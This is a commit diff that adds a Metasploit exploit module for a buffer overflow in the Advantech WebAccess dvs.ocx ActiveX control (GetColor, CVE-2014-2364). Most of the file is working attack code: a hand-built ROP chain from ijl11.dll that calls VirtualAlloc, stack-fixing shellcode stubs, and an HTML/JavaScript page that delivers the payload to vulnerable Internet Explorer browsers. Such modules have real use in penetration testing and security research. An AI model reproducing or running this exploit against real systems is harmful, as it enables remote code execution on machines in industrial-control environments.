Land rapid7#3814 - Advantech WebAccess dvs.ocx GetColor BoF

wchen-r7 · wchen-r7 · commit 11b9a8a6ae01 · 2014-09-23T15:06:21.000-05:00
diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
+      'Description'         => %q{
+        This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
+        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
+        sprintf can be reached with user controlled data through the GetColor function.
+        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
+        7 SP1 with IE8 and IE 9.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Unknown', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2014-2364'],
+          ['ZDI', '14-255'],
+          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
+        ],
+      'DefaultOptions'      =>
+        {
+          'Retries'              => false,
+          'InitialAutoRunScript' => 'migrate -f'
+        },
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :os_name => Msf::OperatingSystems::WINDOWS,
+          :ua_name => /MSIE/i,
+          :ua_ver  => lambda { |ver| Gem::Version.new(ver) <  Gem::Version.new('10') },
+          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
+          :method  => "GetColor"
+        },
+      'Payload'             =>
+        {
+          'Space'           => 1024,
+          'DisableNops'     => true,
+          'BadChars'        => "\x00\x0a\x0d\x5c",
+          # Patch the stack to execute the decoder...
+          'PrependEncoder'  => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
+          # Fix the stack again, this time better :), before the payload
+          # is executed.
+          'Prepend'         => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+                               "\x83\xC0\x08"             + # add eax, byte 8
+                               "\x8b\x20"                 + # mov esp, [eax]
+                               "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000
+        },
+      'Platform'            => 'win',
+      'Arch'                => ARCH_X86,
+      'Targets'             =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'       => 0,
+      'DisclosureDate'      => 'Jul 17 2014'))
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Requested: #{request.uri}")
+
+    content = <<-EOS
+<html>
+<head>
+<meta http-equiv="cache-control" content="max-age=0" />
+<meta http-equiv="cache-control" content="no-cache" />
+<meta http-equiv="expires" content="0" />
+<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
+<meta http-equiv="pragma" content="no-cache" />
+</head>
+<body>
+<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
+<script language='javascript'>
+test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
+</script>
+</body>
+</html>
+    EOS
+
+    print_status("Sending #{self.name}")
+    send_response_html(cli, content, {'Pragma' => 'no-cache'})
+  end
+
+  # Uses gadgets from ijl11.dll 1.1.2.16
+  def rop_payload(code)
+    xpl = rand_text_alphanumeric(61) # offset
+    xpl << [0x60014185].pack("V")    # RET
+    xpl << rand_text_alphanumeric(8)
+
+    # EBX = dwSize (0x40)
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << [0x9ffdafc9].pack("V") # eax value
+    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
+    xpl << [0x60018084].pack("V") # POP EBP # RETN
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
+    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
+    # EDX = flAllocationType (0x1000)
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << [0x9ffdbf89].pack("V") # eax value
+    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
+    # ECX = flProtect (0x40)
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    0x41.times do
+      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
+    end
+    # EAX = ptr to &VirtualAlloc()
+    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
+    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
+    # EBP = POP (skip 4 bytes)
+    xpl << [0x6002054b].pack("V") # POP EBP # RETN
+    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
+    # ESI = ptr to JMP [EAX]
+    xpl << [0x600181cc].pack("V") # POP ESI # RETN
+    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
+    # EDI = ROP NOP (RETN)
+    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
+    xpl << [0x60021ad2].pack("V") # ptr to &(retn)
+    # ESP = lpAddress (automatic)
+    # PUSHAD # RETN
+    xpl << [0x60018399].pack("V") # PUSHAD # RETN
+    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
+    xpl << code
+
+    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
+    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
+
+    xpl
+  end
+
+end
